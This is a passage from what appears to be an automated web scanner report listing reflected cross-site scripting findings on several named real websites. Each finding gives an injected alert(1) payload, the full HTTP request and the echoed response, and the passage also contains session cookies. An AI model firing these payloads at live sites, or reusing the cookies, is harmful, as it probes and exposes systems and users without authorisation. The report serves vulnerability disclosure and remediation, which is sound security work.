User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: js.revsci.net
Cookie: NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; rtc_OpU7=MLuBc48HAV1DFVRCdcKR9w1Atq8QzHTJMWpRG3eQ; udm_0=MLvv7iEOIS5n5S4sf9LIqA+g+agrMrHQQV1C0kQwUz86HrcF639Zp6vdB1eDCp0YUl3bmI9FlfrMX73q2Xuh79cg9x90OARjL22/oad9bJbwnohIOe6D1MV5D5c5izhywMZ3XKnOJbBzqsc2cpwRi0dTlB0eE/9oLdLKMcFiBqOqypS5/e8drHr3MhsMZsuHtDx8/YBcPpoRmMeTuZJtwU/dPTYVpD04WViWivKPwoRCJNV6hSgca89nclM+IEgNYUkW8ed2KxKvKxHe0J6Q1IXAxvsNg1PN8DQfF3Fh1zYVV1aDROir6OXUs4lP1dnOmQSCCLkZRNIrg9rXZHjim9CLZQJRjC3y9EXe7Wma7eRXjJ1SrikK/zqJkYyFeCHf7iNDWrytDhvmrR5NXoSYN+b+lzALAomilbrc4S6O1uuR9+KxW9ETwi2FR+IR1+pFjcKC75WdiqndGmHYJxWvrTAUbO3foKoQ+hLtQDII4GeJ58gwULLawkAO/G/oGZ6K4WRwbQP7wkjX5PRjsuizTSYFX4tuGywyE+7fM4d6xGu7FZy7acLT04NHBtbCFELfalFjrQg=; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6m1VdDt3E/tUdVA6Ab/nTZMFQ==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Fri, 22 Apr 2011 15:28:33 GMT
Cache-Control: max-age=86400, private
Expires: Sat, 23 Apr 2011 15:28:33 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 15:28:33 GMT
Content-Length: 127

/*
* JavaScript include error:
* The customer code "E05511E0625<SCRIPT>ALERT(1)</SCRIPT>BFB396FCEB" was not recognized.
*/

3.168. http://salsacommons.org/o/8001/p/salsa/commons/img/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://salsacommons.org
Path:   /o/8001/p/salsa/commons/img/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66456"-alert(1)-"9f81cfc7a30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /o66456"-alert(1)-"9f81cfc7a30/8001/p/salsa/commons/img/favicon.ico HTTP/1.1
Host: salsacommons.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 16:04:43 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: SRV=vweb4; path=/
Content-Length: 13402

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
"text/javascript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "http://salsacommons.org/o66456"-alert(1)-"9f81cfc7a30/8001/p/salsa/commons/img/favicon.ico?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({

...[SNIP]...

3.169. http://salsacommons.org/o/8001/p/salsa/commons/img/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://salsacommons.org
Path:   /o/8001/p/salsa/commons/img/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f7c4"-alert(1)-"e91fbaea79c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /o/8001/p3f7c4"-alert(1)-"e91fbaea79c/salsa/commons/img/favicon.ico HTTP/1.1
Host: salsacommons.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 16:04:48 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: SRV=vweb5; path=/
Content-Length: 13402

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
avascript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "http://salsacommons.org/o/8001/p3f7c4"-alert(1)-"e91fbaea79c/salsa/commons/img/favicon.ico?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({
mod
...[SNIP]...

3.170. http://salsacommons.org/o/8001/p/salsa/commons/img/favicon.ico [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://salsacommons.org
Path:   /o/8001/p/salsa/commons/img/favicon.ico

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64410"-alert(1)-"1c986b6dd8 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /o/8001/p/salsa/commons/img/favicon.ico64410"-alert(1)-"1c986b6dd8 HTTP/1.1
Host: salsacommons.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 16:05:02 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: SRV=vweb1; path=/
Content-Length: 13400

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...

function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "http://salsacommons.org/o/8001/p/salsa/commons/img/favicon.ico64410"-alert(1)-"1c986b6dd8?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({
modal: true,
widt
...[SNIP]...

3.171. https://secure.ubi.com/register/CreateAccount.aspx [NextURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.ubi.com
Path:   /register/CreateAccount.aspx

Issue detail

The value of the NextURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd14d"style%3d"x%3aexpression(alert(1))"74425cf103d was submitted in the NextURL parameter. This input was echoed as fd14d"style="x:expression(alert(1))"74425cf103d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /register/CreateAccount.aspx?genomeId=c970157e-c24d-44f3-aba7-819b852e0e02&NextURL=999895'()973289fd14d"style%3d"x%3aexpression(alert(1))"74425cf103d&lang=en-US HTTP/1.1
Host: secure.ubi.com
Connection: keep-alive
Referer: https://secure.ubi.com/register/login.aspx?genomeId=C970157E-C24D-44F3-ABA7-819B852E0E02&lang=en-US&NextUrl=999895%27%28%29973289
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=101287877.1303486155.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visitor_id=A8CC6CF1-F210-440C-B57B-E6567568B947; utsver=30053; ubisession=1976650102; __utma=101287877.1723011522.1303486155.1303486155.1303486155.1; __utmc=101287877; __utmb=101287877.2.10.1303486155; ASP.NET_SessionId=hyemfw450y0nxlb4z35rg2eu

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 130586
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 22 Apr 2011 16:05:48 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>



...[SNIP]...
<a href="javascript:AbandonAccountCreation('999895'()973289fd14d"style="x:expression(alert(1))"74425cf103d?cancel=true');" style="position:relative; z-index:999; display:block; width:30px; height:25px; border:0px; text-decoration:none; float:right;">
...[SNIP]...

3.172. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 168d7<script>alert(1)</script>c3e46dbbdc1 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///C%3A/cdn/2011/04/22/html/dork/xss-reflected-cwe79-secure.ubi.com_443.htm168d7<script>alert(1)</script>c3e46dbbdc1 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Fri, 22 Apr 2011 17:12:39 GMT
Via: NS-CACHE: 100
Etag: "f72477ac64c705668216310b102e3cb7503ff057"
Content-Length: 163
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Fri, 22 Apr 2011 17:22:38 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/cdn/2011/04/22/html/dork/xss-reflected-cwe79-secure.ubi.com_443.htm168d7<script>alert(1)</script>c3e46dbbdc1", "diggs": 0});

3.173. http://www.dmvnow.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dmvnow.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82ef4"><script>alert(1)</script>42d3138b490 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico82ef4"><script>alert(1)</script>42d3138b490 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dmvnow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Set-Cookie: BIGipServerhttp_pool=2525040812.20480.0000; expires=Sat, 23-Apr-2011 15:18:04 GMT; path=/
Server: Microsoft-IIS/5.0
Date: Fri, 22 Apr 2011 15:18:04 GMT
X-Powered-By: ASP.NET
Content-Length: 17571
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<HTML>
   <HEAD>
           <title>Commonwealth of Virginia Department of
...[SNIP]...
<a class="main" href="/webdoc/utilities/error.asp?

404;http://www.dmvnow.com/favicon.ico82ef4"><script>alert(1)</script>42d3138b490&amp;


pf=y">
...[SNIP]...

3.174. http://www.salsalabs.com/o/8001/p/salsa/website/labs/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salsalabs.com
Path:   /o/8001/p/salsa/website/labs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2bc1"-alert(1)-"492761e65ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /od2bc1"-alert(1)-"492761e65ec/8001/p/salsa/website/labs/ HTTP/1.1
Host: www.salsalabs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:26:59 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 13384

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
text/javascript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "http://www.salsalabs.com/od2bc1"-alert(1)-"492761e65ec/8001/p/salsa/website/labs/?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({
modal:
...[SNIP]...

3.175. http://www.salsalabs.com/o/8001/p/salsa/website/labs/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salsalabs.com
Path:   /o/8001/p/salsa/website/labs/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17b9f"-alert(1)-"154cd4038ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /o/8001/p17b9f"-alert(1)-"154cd4038ad/salsa/website/labs/ HTTP/1.1
Host: www.salsalabs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:27:11 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 13384

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
vascript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "http://www.salsalabs.com/o/8001/p17b9f"-alert(1)-"154cd4038ad/salsa/website/labs/?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({
modal: true,

...[SNIP]...

3.176. http://www.salsalabs.com/o/8001/p/salsa/website/labs/img/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salsalabs.com
Path:   /o/8001/p/salsa/website/labs/img/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e80a5"-alert(1)-"a7f7679dbe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /oe80a5"-alert(1)-"a7f7679dbe8/8001/p/salsa/website/labs/img/favicon.ico HTTP/1.1
Host: www.salsalabs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:31:14 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 13414

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
text/javascript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "http://www.salsalabs.com/oe80a5"-alert(1)-"a7f7679dbe8/8001/p/salsa/website/labs/img/favicon.ico?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({

...[SNIP]...

3.177. http://www.salsalabs.com/o/8001/p/salsa/website/labs/img/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salsalabs.com
Path:   /o/8001/p/salsa/website/labs/img/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2795"-alert(1)-"3186fbadb7e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /o/8001/pb2795"-alert(1)-"3186fbadb7e/salsa/website/labs/img/favicon.ico HTTP/1.1
Host: www.salsalabs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:31:55 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 13414

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
vascript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "http://www.salsalabs.com/o/8001/pb2795"-alert(1)-"3186fbadb7e/salsa/website/labs/img/favicon.ico?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({

...[SNIP]...

3.178. http://www.salsalabs.com/o/8001/p/salsa/website/labs/img/favicon.ico [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salsalabs.com
Path:   /o/8001/p/salsa/website/labs/img/favicon.ico

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5413"-alert(1)-"2568c09e6eb was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /o/8001/p/salsa/website/labs/img/favicon.icoc5413"-alert(1)-"2568c09e6eb HTTP/1.1
Host: www.salsalabs.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:32:09 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 13414

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "http://www.salsalabs.com/o/8001/p/salsa/website/labs/img/favicon.icoc5413"-alert(1)-"2568c09e6eb?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({
modal: true,
widt
...[SNIP]...

3.179. https://www.salsalabs.com/dia/hq/css/custom.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salsalabs.com
Path:   /dia/hq/css/custom.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95f48"-alert(1)-"9e6d2606619 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /95f48"-alert(1)-"9e6d2606619/hq/css/custom.css HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Referer: https://www.salsalabs.com/dia/hq/sso/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:27:09 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 13439

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
text/javascript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "https://www.salsalabs.com/95f48"-alert(1)-"9e6d2606619/hq/css/custom.css?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({
modal: true,

...[SNIP]...

3.180. https://www.salsalabs.com/dia/hq/sso/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salsalabs.com
Path:   /dia/hq/sso/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7ecf"-alert(1)-"bf4e2d5f0b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f7ecf"-alert(1)-"bf4e2d5f0b7/hq/sso/ HTTP/1.1
Host: www.salsalabs.com
Connection: keep-alive
Referer: http://www.salsalabs.com/o/8001/p/salsa/website/labs/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=490FDACFD68311FC85BF74AD2B44D23F-n4; SRV=vweb17; __utmz=13431349.1303485990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=13431349.1041301574.1303485990.1303485990.1303485990.1; __utmc=13431349; __utmb=13431349.1.10.1303485990

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Fri, 22 Apr 2011 15:27:07 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 13451

<!DOCTYPE html>
<html>
<head><!-- template-250 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>Salsa Commons | Empowering the platform for change</title>
<meta nam
...[SNIP]...
text/javascript">
$(function() {
function showLogin(redirect) {
var newDialog = $("#loginDialog").clone();

var redirectURL = "https://www.salsalabs.com/f7ecf"-alert(1)-"bf4e2d5f0b7/hq/sso/?";
if(arguments.length) { redirectURL = redirect; }
//console.log(redirectURL);

$(newDialog).dialog({
modal: true,

...[SNIP]...

3.181. https://www.salsalabs.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salsalabs.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89371"-alert(1)-"db10ed2c3c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico89371"-alert(1)-"db10ed2c3c4 HTTP/1.1
Host: www.salsalabs.com
